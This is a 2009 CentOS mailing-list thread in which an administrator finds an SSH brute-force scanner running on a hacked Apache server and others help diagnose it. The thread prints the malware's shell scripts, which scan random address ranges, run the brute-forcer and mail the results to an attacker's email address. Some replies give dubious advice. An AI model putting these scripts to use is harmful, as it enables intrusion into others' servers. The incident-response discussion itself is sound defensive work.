CentOS - Jun 2009 - Centos 5.3 -> Apache - Under Attack ? Oh hell....

Guys, apache cpus usage is hitting 100% sometimes ( to such an extent that its
very noticeable)  on a box with just 8 users or so.

i m getting this when i run 'top'. The worrying thing is seeing the work
'atack' under command


PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
23119 apache    15   0   964  556  472 S  0.7  0.0   0:03.68 atack
23479 apache    15   0   964  556  472 S  0.7  0.0   0:01.94 atack
22170 apache    15   0   964  560  472 S  0.3  0.0   0:05.23 atack
22375 apache    15   0   964  560  472 S  0.3  0.0   0:04.21 atack
22858 apache    15   0   964  560  472 S  0.3  0.0   0:02.87 atack
22997 apache    15   0   964  560  472 S  0.3  0.0   0:04.11 atack
22999 apache    15   0   964  560  472 S  0.3  0.0   0:02.22 atack
23007 apache    15   0   964  560  472 S  0.3  0.0   0:03.79 atack
23099 apache    15   0   964  556  472 S  0.3  0.0   0:02.18 atack
23101 apache    15   0   964  556  472 S  0.3  0.0   0:02.48 atack
23108 apache    15   0   964  556  472 S  0.3  0.0   0:03.59 atack
23109 apache    15   0   964  556  472 S  0.3  0.0   0:02.75 atack
23112 apache    15   0   972  504  412 S  0.3  0.0   0:04.70 atack
23115 apache    15   0   964  556  472 S  0.3  0.0   0:03.75 atack
23116 apache    15   0   964  556  472 S  0.3  0.0   0:02.80 atack
23121 apache    15   0   972  504  412 S  0.3  0.0   0:03.79 atack
23384 apache    15   0   964  556  472 S  0.3  0.0   0:01.63 atack
23389 apache    15   0   964  556  472 S  0.3  0.0   0:03.52 atack
23392 apache    15   0   964  556  472 S  0.3  0.0   0:01.61 atack
23397 apache    15   0   964  556  472 S  0.3  0.0   0:01.62 atack
23405 apache    15   0   964  556  472 S  0.3  0.0   0:03.64 atack

When i 'ps -ef' i can see many lines as below;

apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
apache   24292 23378  0 11:00 ?        00:00:01 ./atack 100
apache   24335 23378  0 11:01 ?        00:00:00 ./atack 100
apache   24344 23378  0 11:01 ?        00:00:00 ./atack 100
apache   24347 23378  0 11:02 ?        00:00:00 ./atack 100
apache   24358 23378  0 11:04 ?        00:00:00 ./atack 100


Hell, has my centos 5.3 box  been hacked??? Help  !!!!!!!!!!

sorry typos amended....




    
Guys, apache's cpu usage is hitting
100% sometimes ( to such an extent that its 
very noticeable) 
on a box ( 2gb ram)  with just 8 users or so. This newver happended before.

i m getting this when i
run 'top'. The worrying thing is seeing the word 'atack' 
under
command


PID USER      PR  NI 
VIRT  RES  SHR S %CPU %MEM    TIME+ 
COMMAND
23119 apache    15  0  964  556 
472 S  0.7  0.0  0:03.68 atack
23479 apache 
  15  0  964  556  472 S  0.7 
0.0  0:01.94 atack
22170 apache    15  0 
964  560  472 S  0.3  0.0  0:05.23 atack
22375 apache    15  0  964  560  472 S 
0.3  0.0  0:04.21 atack
22858 apache    15 
0  964  560  472 S  0.3  0.0  0:02.87
atack
22997 apache    15  0  964  560 
472 S  0.3  0.0  0:04.11 atack
22999 apache 
  15  0  964  560  472 S  0.3 
0.0  0:02.22 atack
23007 apache    15  0 
964  560  472 S  0.3  0.0  0:03.79 atack
23099 apache    15  0  964  556  472 S 
0.3  0.0  0:02.18 atack
23101 apache    15 
0  964  556  472 S  0.3  0.0  0:02.48
atack
23108 apache    15  0  964  556 
472 S  0.3  0.0  0:03.59 atack
23109 apache 
  15  0  964  556  472 S  0.3 
0.0  0:02.75 atack
23112 apache    15  0 
972  504  412 S  0.3  0.0  0:04.70 atack
23115 apache    15  0  964  556  472 S 
0.3  0.0  0:03.75 atack
23116 apache    15 
0  964  556  472 S  0.3  0.0  0:02.80
atack
23121 apache    15  0  972  504 
412 S  0.3  0.0  0:03.79 atack
23384 apache 
  15  0  964  556  472 S  0.3 
0.0  0:01.63 atack
23389 apache    15  0 
964  556  472 S  0.3  0.0  0:03.52 atack
23392 apache    15  0  964  556  472 S 
0.3  0.0  0:01.61 atack
23397 apache    15 
0  964  556  472 S  0.3  0.0  0:01.62
atack
23405 apache    15  0  964  556 
472 S  0.3  0.0  0:03.64 atack

When i 'ps
-ef' i can see many lines as below;

apache  24253
23378  0 10:54 ?        00:00:00 ./atack
100
apache  24286 23378  0 10:59 ?     
  00:00:00 ./atack 100
apache  24292 23378  0
11:00 ?        00:00:01 ./atack 100
apache 
24335 23378  0 11:01 ?        00:00:00
./atack 100
apache  24344 23378  0 11:01 ?   
    00:00:00 ./atack 100
apache  24347 23378 
0 11:02 ?        00:00:00 ./atack 100
apache 
24358 23378  0 11:04 ?        00:00:00
./atack 100


Hell, has my centos 5.3 box  been
hacked??? Help  !!!!!!!!!!

On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate
wrote:
> 
> Hell, has my centos 5.3 box  been hacked??? Help  !!!!!!!!!!
	Yes.  Reinstall; fully update components; restore *data*
	from backups (you have backups, right?) and review what
	web packages you have installed and make sure those are
	fully updated also.

	Your box is compromised.  You have no way to gauge the
	severity, so treat it as both a lost cause; nothing on
	it can be trusted at this point.




							John

-- 
"I'm sorry but our engineers do not have phones."
As stated by a Network Solutions Customer Service representative when asked to
be put through to an engineer.

"My other computer is your windows box."
                                     Ralf Hildebrandt
<sxem> trying to play sturgeon while it's under attack is apparently
not fun.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
URL:
<http://lists.centos.org/pipermail/centos/attachments/20090602/850310ae/attachment-0001.sig>

John R. Dennison wrote:
> On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate wrote:
>   
>> Hell, has my centos 5.3 box  been hacked??? Help  !!!!!!!!!!
>>     
>
> 	Yes.  Reinstall; fully update components; restore *data*
> 	from backups (you have backups, right?) and review what
> 	web packages you have installed and make sure those are
> 	fully updated also.
>
> 	Your box is compromised.  You have no way to gauge the
> 	severity, so treat it as both a lost cause; nothing on
> 	it can be trusted at this point.
>
>
>
>
> 							John
>
>   
> ------------------------------------------------------------------------
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
>   
some google foo shows this is a WINDOWS exploit not a linux one.

http://www.linuxquestions.org/questions/slackware-14/analyzing-apache-logs-174552/

John R. Dennison wrote:
> On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate wrote:
>   
>> Hell, has my centos 5.3 box  been hacked??? Help  !!!!!!!!!!
>>     
>
> 	Yes.  Reinstall; fully update components; restore *data*
> 	from backups (you have backups, right?) and review what
> 	web packages you have installed and make sure those are
> 	fully updated also.
>
> 	Your box is compromised.  You have no way to gauge the
> 	severity, so treat it as both a lost cause; nothing on
> 	it can be trusted at this point.
>
>
>
>
> 							John
>
>   
> ------------------------------------------------------------------------
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
>   
http://www.derkeiler.com/Newsgroups/comp.os.linux.security/2004-05/0202.html

reply below



----- Original Message ----
> From: John R. Dennison <jrd at gerdesas.com>
> To: CentOS mailing list <centos at centos.org>
> Sent: Wednesday, June 3, 2009 11:43:46 AM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
> 
> On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate wrote:
> > 
> > Hell, has my centos 5.3 box  been hacked??? Help  !!!!!!!!!!
> 
>     Yes.  Reinstall; fully update components; restore *data*
>     from backups (you have backups, right?) and review what
>     web packages you have installed and make sure those are
>     fully updated also.
> 
>     Your box is compromised.  You have no way to gauge the
>     severity, so treat it as both a lost cause; nothing on
>     it can be trusted at this point.

ohhhhhhhhhhhhhhhh .... godddddddddddddd.....................

i have a quite a few linux boxes and not even one has been hacked..... oh man
!!!!!!

really??? i have to format the box.....

Hello:

If there are processes running on your machine 
which you do not recognize, assume the machine has
been compromised.  Take it offline and wipe it
immediately.

	Neil

--
Neil Aggarwal, (832)245-7314, www.JAMMConsulting.com
Eliminate junk email and reclaim your inbox.
Visit http://www.spammilter.com for details.  
> -----Original Message-----
> From: centos-bounces at centos.org 
> [mailto:centos-bounces at centos.org] On Behalf Of Linux Advocate
> Sent: Tuesday, June 02, 2009 10:23 PM
> To: CentOS mailing list
> Subject: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
> 
> 
> Guys, apache cpus usage is hitting 100% sometimes ( to such 
> an extent that its very noticeable)  on a box with just 8 users or so.
> 
> i m getting this when i run 'top'. The worrying thing is 
> seeing the work 'atack' under command
> 
> 
> PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
> 23119 apache    15   0   964  556  472 S  0.7  0.0   0:03.68 atack
> 23479 apache    15   0   964  556  472 S  0.7  0.0   0:01.94 atack
> 22170 apache    15   0   964  560  472 S  0.3  0.0   0:05.23 atack
> 22375 apache    15   0   964  560  472 S  0.3  0.0   0:04.21 atack
> 22858 apache    15   0   964  560  472 S  0.3  0.0   0:02.87 atack
> 22997 apache    15   0   964  560  472 S  0.3  0.0   0:04.11 atack
> 22999 apache    15   0   964  560  472 S  0.3  0.0   0:02.22 atack
> 23007 apache    15   0   964  560  472 S  0.3  0.0   0:03.79 atack
> 23099 apache    15   0   964  556  472 S  0.3  0.0   0:02.18 atack
> 23101 apache    15   0   964  556  472 S  0.3  0.0   0:02.48 atack
> 23108 apache    15   0   964  556  472 S  0.3  0.0   0:03.59 atack
> 23109 apache    15   0   964  556  472 S  0.3  0.0   0:02.75 atack
> 23112 apache    15   0   972  504  412 S  0.3  0.0   0:04.70 atack
> 23115 apache    15   0   964  556  472 S  0.3  0.0   0:03.75 atack
> 23116 apache    15   0   964  556  472 S  0.3  0.0   0:02.80 atack
> 23121 apache    15   0   972  504  412 S  0.3  0.0   0:03.79 atack
> 23384 apache    15   0   964  556  472 S  0.3  0.0   0:01.63 atack
> 23389 apache    15   0   964  556  472 S  0.3  0.0   0:03.52 atack
> 23392 apache    15   0   964  556  472 S  0.3  0.0   0:01.61 atack
> 23397 apache    15   0   964  556  472 S  0.3  0.0   0:01.62 atack
> 23405 apache    15   0   964  556  472 S  0.3  0.0   0:03.64 atack
> 
> When i 'ps -ef' i can see many lines as below;
> 
> apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
> apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
> apache   24292 23378  0 11:00 ?        00:00:01 ./atack 100
> apache   24335 23378  0 11:01 ?        00:00:00 ./atack 100
> apache   24344 23378  0 11:01 ?        00:00:00 ./atack 100
> apache   24347 23378  0 11:02 ?        00:00:00 ./atack 100
> apache   24358 23378  0 11:04 ?        00:00:00 ./atack 100
> 
> 
> Hell, has my centos 5.3 box  been hacked??? Help  !!!!!!!!!!
> 
> 
>       
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos

it's possible your box is attacked, has been compromised.. of it's
possible
that it's also being slammed by some sort of potential attack/hack.
regarding the apache app, what do the log files say... what apps do you have
running on the apche server? are these apps home grown, or installed from
some public source?

do the research online to see what kind of attack you might have...

it might be that your box is completely safe...

you might also track/monitor any kind of attempt at the box communicating
with other ip addresses that you aren't using....

doing a complete reinstall is a draconian measure and may not be called
for...

your mileage might vary...


-----Original Message-----
From: centos-bounces at centos.org [mailto:centos-bounces at centos.org]On
Behalf Of Linux Advocate
Sent: Tuesday, June 02, 2009 8:23 PM
To: CentOS mailing list
Subject: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....



Guys, apache cpus usage is hitting 100% sometimes ( to such an extent that
its very noticeable)  on a box with just 8 users or so.

i m getting this when i run 'top'. The worrying thing is seeing the work
'atack' under command


PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
23119 apache    15   0   964  556  472 S  0.7  0.0   0:03.68 atack
23479 apache    15   0   964  556  472 S  0.7  0.0   0:01.94 atack
22170 apache    15   0   964  560  472 S  0.3  0.0   0:05.23 atack
22375 apache    15   0   964  560  472 S  0.3  0.0   0:04.21 atack
22858 apache    15   0   964  560  472 S  0.3  0.0   0:02.87 atack
22997 apache    15   0   964  560  472 S  0.3  0.0   0:04.11 atack
22999 apache    15   0   964  560  472 S  0.3  0.0   0:02.22 atack
23007 apache    15   0   964  560  472 S  0.3  0.0   0:03.79 atack
23099 apache    15   0   964  556  472 S  0.3  0.0   0:02.18 atack
23101 apache    15   0   964  556  472 S  0.3  0.0   0:02.48 atack
23108 apache    15   0   964  556  472 S  0.3  0.0   0:03.59 atack
23109 apache    15   0   964  556  472 S  0.3  0.0   0:02.75 atack
23112 apache    15   0   972  504  412 S  0.3  0.0   0:04.70 atack
23115 apache    15   0   964  556  472 S  0.3  0.0   0:03.75 atack
23116 apache    15   0   964  556  472 S  0.3  0.0   0:02.80 atack
23121 apache    15   0   972  504  412 S  0.3  0.0   0:03.79 atack
23384 apache    15   0   964  556  472 S  0.3  0.0   0:01.63 atack
23389 apache    15   0   964  556  472 S  0.3  0.0   0:03.52 atack
23392 apache    15   0   964  556  472 S  0.3  0.0   0:01.61 atack
23397 apache    15   0   964  556  472 S  0.3  0.0   0:01.62 atack
23405 apache    15   0   964  556  472 S  0.3  0.0   0:03.64 atack

When i 'ps -ef' i can see many lines as below;

apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
apache   24292 23378  0 11:00 ?        00:00:01 ./atack 100
apache   24335 23378  0 11:01 ?        00:00:00 ./atack 100
apache   24344 23378  0 11:01 ?        00:00:00 ./atack 100
apache   24347 23378  0 11:02 ?        00:00:00 ./atack 100
apache   24358 23378  0 11:04 ?        00:00:00 ./atack 100


Hell, has my centos 5.3 box  been hacked??? Help  !!!!!!!!!!



_______________________________________________
CentOS mailing list
CentOS at centos.org
http://lists.centos.org/mailman/listinfo/centos

BRUCE U ARE A F******* GENIUS MAN !!!!!

u were right bro....thanx for spending the time on this man....

more info below !!!!!!!!!!!!!



----- Original Message ----
> From: bruce <bedouglas at earthlink.net>
> To: linuxhousedn at yahoo.com
> Sent: Wednesday, June 3, 2009 9:53:24 PM
> Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
> 
> hi...
> 
> i've seen a few of your threads on your issue of the 'atack'
processes
> running from your web server...
> 
> i'm replying to you offline, as ......
> 
> 
> take a look over your box, and let's see what you have...
> 

as per yr tip i had found a file called atack under this folder /dev/shm/unix
.... even though i could not locate such a file before.....
i have now removed that file and am now probing the contents of the
/dev/shm/unix folder.....

[root at fwgw unix]# pwd
/dev/shm/unix

[root at fwgw unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache     360 Jun  3 23:47 .
drwxrwxrwt 3 root   root        60 Jun  3 00:24 ..
-rwxr-xr-x 1 apache apache       0 May 19 06:02   124.164.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:28   129.135.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:25   129.find.22
-rwxr-xr-x 1 apache apache       0 May 25 13:54   21.168.find.22
-rwxr-xr-x 1 apache apache   12687 May 25 06:16  60.191.find.22
-rw-r--r-- 1 apache apache       0 Jun  3 23:45   83.182.find.22
-rwxr-xr-x 1 apache apache    4631 Apr 21 17:50   84.2.find.22
-rwxr-xr-x 1 apache apache       0 May 25 06:17   89.38.find.22
-rwxr-xr-x 1 apache apache    2362 May 19 15:28   91.204.find.22
-rwxr-xr-x 1 apache apache     216 May 18  2005   auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41  data.conf
-rwxr-xr-x 1 apache apache   15729 Oct 14  2005  find
-rw-r--r-- 1 apache apache    5262 Jun  3 23:45  log
-rwxr-xr-x 1 apache apache     751 May 25 06:33  unix
-rw-r--r-- 1 apache apache       0 Jun  3 23:04   vuln.txt
-rwxr-xr-x 1 apache apache     671 May 25 13:56  x


The contents of  file 'x' are;


#!/bin/bash
echo "[+] PLM prea destept pentru voi : Yuli [+]"
X=0
c=0
while [ $X -le 255 ]
do
c=$RANDOM
let "c %= 255"
echo "[+] Scanam radom class b $1.$c [+]"
./find $1.$c 22
sleep 10
cat $1.$c.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100 >> log
mail -s $1.$c yuli1989xxx at yahoo.com < log
rm -rf $1.$c.find.22 ip.conf
echo "[+] Scanner a terminat de scanat !"
echo "[+] Next random class b !"
X=$((X+1))


the contents of the file 'unix' are;


#!/bin/bash
if [ $# != 1 ]; then
        echo "[+] Folosim : $0 [b class]"
        exit;
fi

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+]   SSH Brute force scanner : user & password   [+]"
echo "[+]        Undernet Channel : #yuli               [+]"
echo "[+][+][+][+][+][+][+] ver 0x10  [+][+][+][+][+][+][+]"
./find $1 22

sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"


the contents of 'auto' are;

#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
        echo -n "./assh $brange.$crange ; " >> $file
        let crange=crange+1
done


the contents of 'log' are;

[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]


Further googling indicates that UnixCod  is a brute force ssh scanner... what is
is odd is that i have fail2ban ruunning ( which blocks IPs after 2 failed
attempts) and a 8 letter passwd but i still got hacked....

Guys...any comments....

AND ONCE AGAIN THANKS BRUCE
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Regards,
Marco.

>
>
> PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
> 23119 apache    15   0   964  556  472 S  0.7  0.0   0:03.68 atack
> 23479 apache    15   0   964  556  472 S  0.7  0.0   0:01.94 atack
> 22170 apache    15   0   964  560  472 S  0.3  0.0   0:05.23 atack
> 22375 apache    15   0   964  560  472 S  0.3  0.0   0:04.21 atack
> 22858 apache    15   0   964  560  472 S  0.3  0.0   0:02.87 atack
> 22997 apache    15   0   964  560  472 S  0.3  0.0   0:04.11 atack
> 22999 apache    15   0   964  560  472 S  0.3  0.0   0:02.22 atack
> 23007 apache    15   0   964  560  472 S  0.3  0.0   0:03.79 atack
> 23099 apache    15   0   964  556  472 S  0.3  0.0   0:02.18 atack
> 23101 apache    15   0   964  556  472 S  0.3  0.0   0:02.48 atack
> 23108 apache    15   0   964  556  472 S  0.3  0.0   0:03.59 atack
> 23109 apache    15   0   964  556  472 S  0.3  0.0   0:02.75 atack
> 23112 apache    15   0   972  504  412 S  0.3  0.0   0:04.70 atack
> 23115 apache    15   0   964  556  472 S  0.3  0.0   0:03.75 atack
> 23116 apache    15   0   964  556  472 S  0.3  0.0   0:02.80 atack
> 23121 apache    15   0   972  504  412 S  0.3  0.0   0:03.79 atack
> 23384 apache    15   0   964  556  472 S  0.3  0.0   0:01.63 atack
> 23389 apache    15   0   964  556  472 S  0.3  0.0   0:03.52 atack
> 23392 apache    15   0   964  556  472 S  0.3  0.0   0:01.61 atack
> 23397 apache    15   0   964  556  472 S  0.3  0.0   0:01.62 atack
> 23405 apache    15   0   964  556  472 S  0.3  0.0   0:03.64 atack
>
> When i 'ps -ef' i can see many lines as below;
>
> apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
> apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
> apache   24292 23378  0 11:00 ?        00:00:01 ./atack 100
> apache   24335 23378  0 11:01 ?        00:00:00 ./atack 100
> apache   24344 23378  0 11:01 ?        00:00:00 ./atack 100
> apache   24347 23378  0 11:02 ?        00:00:00 ./atack 100
> apache   24358 23378  0 11:04 ?        00:00:00 ./atack 100
>
>
> Hell, has my centos 5.3 box  been hacked??? Help  !!!!!!!!!!
>
>
I good tool to have on your linux box that may help, some.

http://rkhunter.sourceforge.net/

http://rpmfind.net/linux/rpm2html/search.php?query=rkhunter

After installing do.

rkhunter --update

rkhunter -c

And see if it finds anything.
-------------- next part --------------
An HTML attachment was scrubbed...
URL:
<http://lists.centos.org/pipermail/centos/attachments/20090603/a90d6f17/attachment-0001.html>

I usually watch and listen to this mailing list but this one really 
caught my eye.. I used to do alot of this in the military for 20yrs on 
nix boxes. Now I am a net engineer for a mid sized wisp.
 I have seen how brutal attacks take place on nix boxes. When I config a 
nix box the first thing I do is set the firewall up to block all ports 
above 1048 and only let in or out what ports are needed for the machine. 
My favorite ports to block are ftp,ssh and telnet. I will configure 
different ports for those apps if they are needed. I even block these 
common ports on our gateway to the network and only allow certain 
accounts inside the net access because they do not know how to change 
their ports to something uncommon.
 Most root kits are hard scripted for the common ports, unless the 
attacker is smart enough to use a port scanner try and find alternate 
ports but I can also block most scanners by dropping certain connection 
types.
 I have had a machine online for about 16yrs uptime with no attacks. 
They try but they die:)
If it was easy enough for a root kit to get access to your machine then 
there are some definite holes in the system.

Matt wrote:
>
>
>
>     PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
>     23119 apache    15   0   964  556  472 S  0.7  0.0   0:03.68 atack
>     23479 apache    15   0   964  556  472 S  0.7  0.0   0:01.94 atack
>     22170 apache    15   0   964  560  472 S  0.3  0.0   0:05.23 atack
>     22375 apache    15   0   964  560  472 S  0.3  0.0   0:04.21 atack
>     22858 apache    15   0   964  560  472 S  0.3  0.0   0:02.87 atack
>     22997 apache    15   0   964  560  472 S  0.3  0.0   0:04.11 atack
>     22999 apache    15   0   964  560  472 S  0.3  0.0   0:02.22 atack
>     23007 apache    15   0   964  560  472 S  0.3  0.0   0:03.79 atack
>     23099 apache    15   0   964  556  472 S  0.3  0.0   0:02.18 atack
>     23101 apache    15   0   964  556  472 S  0.3  0.0   0:02.48 atack
>     23108 apache    15   0   964  556  472 S  0.3  0.0   0:03.59 atack
>     23109 apache    15   0   964  556  472 S  0.3  0.0   0:02.75 atack
>     23112 apache    15   0   972  504  412 S  0.3  0.0   0:04.70 atack
>     23115 apache    15   0   964  556  472 S  0.3  0.0   0:03.75 atack
>     23116 apache    15   0   964  556  472 S  0.3  0.0   0:02.80 atack
>     23121 apache    15   0   972  504  412 S  0.3  0.0   0:03.79 atack
>     23384 apache    15   0   964  556  472 S  0.3  0.0   0:01.63 atack
>     23389 apache    15   0   964  556  472 S  0.3  0.0   0:03.52 atack
>     23392 apache    15   0   964  556  472 S  0.3  0.0   0:01.61 atack
>     23397 apache    15   0   964  556  472 S  0.3  0.0   0:01.62 atack
>     23405 apache    15   0   964  556  472 S  0.3  0.0   0:03.64 atack
>
>     When i 'ps -ef' i can see many lines as below;
>
>     apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
>     apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
>     apache   24292 23378  0 11:00 ?        00:00:01 ./atack 100
>     apache   24335 23378  0 11:01 ?        00:00:00 ./atack 100
>     apache   24344 23378  0 11:01 ?        00:00:00 ./atack 100
>     apache   24347 23378  0 11:02 ?        00:00:00 ./atack 100
>     apache   24358 23378  0 11:04 ?        00:00:00 ./atack 100
>
>
>     Hell, has my centos 5.3 box  been hacked??? Help  !!!!!!!!!!
>
>  
> I good tool to have on your linux box that may help, some.
>  
> http://rkhunter.sourceforge.net/
>  
> http://rpmfind.net/linux/rpm2html/search.php?query=rkhunter
>  
> After installing do.
>  
> rkhunter --update
>
> rkhunter -c
>  
> And see if it finds anything.
> ------------------------------------------------------------------------
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
>

Matt, great idea.... I FOUND SOMETHING... pls see below...

________________________________
>From: Matt <lm7812 at gmail.com>
>To: CentOS mailing list <centos at centos.org>
>Sent: Thursday, June 4, 2009 4:40:57 AM
>Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
>PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
>23119 apache    15   0   964  556  472 S  0.7  0.0   0:03.68 atack
>When i 'ps -ef' i can see many lines as below;
>apache   24253 23378  0 10:54 ?        00:00:00 ./atack 100
>apache   24286 23378  0 10:59 ?        00:00:00 ./atack 100
 
>I good tool to have on your linux box that may help, some. 
>http://rkhunter.sourceforge.net/ 
>http://rpmfind.net/linux/rpm2html/search.php?query=rkhunter 
>After installing do.
 >rkhunter --update
>rkhunter -c
 >And see if it finds anything.


I DID FIND SOMETHING...NOT SURE WHAT THOUGH ;)

* Filesystem checks
   Checking /dev for suspicious files...                      [ OK ]
   Scanning for hidden files...                               [ Warning! ]
---------------
/etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev
---------------
Please inspect:  /usr/share/man/man1/..1.gz (gzip compressed data, from Unix,
max compression)  /dev/.udev (directory)

The contents of the /dev/.udev folder;

drwxr-xr-x  2 root root  540 Jun  8 15:41 db
drwxr-xr-x  2 root root  740 Jun  8 15:41 failed
-rw-r--r--  1 root root    4 Jun  8 15:42 uevent_seqnum


The contents of the ../man1/ folder ;

[root at fwg man1]# ls -al  :.1.gz
-rw-r--r-- 1 root root 40 Jan 22 09:14 :.1.gz

[root at fwgw man1]# ls -al  [.1.gz
-rw-r--r-- 1 root root 40 Jan 22 09:14 [.1.gz


Anything out of the ordinary?


---------------------------- Scan results ----------------------------

MD5 scan
Skipped  <---  WHY SKIPPED ? bcos OS unknown as shown in the NOTE below?

File scan
Scanned files: 342
Possible infected files: 0

Application scan
Vulnerable applications: 0

Scanning took 32 seconds

....................... end .........................................


NOTE: When we run rkhunter,  rkhunter says the lines below...eventhough i 
installed frm the centos repo? but still it says its an unknown OS

Rootkit Hunter 1.2.9 is running
Determining OS... Unknown
Warning: This operating system is not fully supported!
All MD5 checks will be skipped!

Anything out of the ordinary?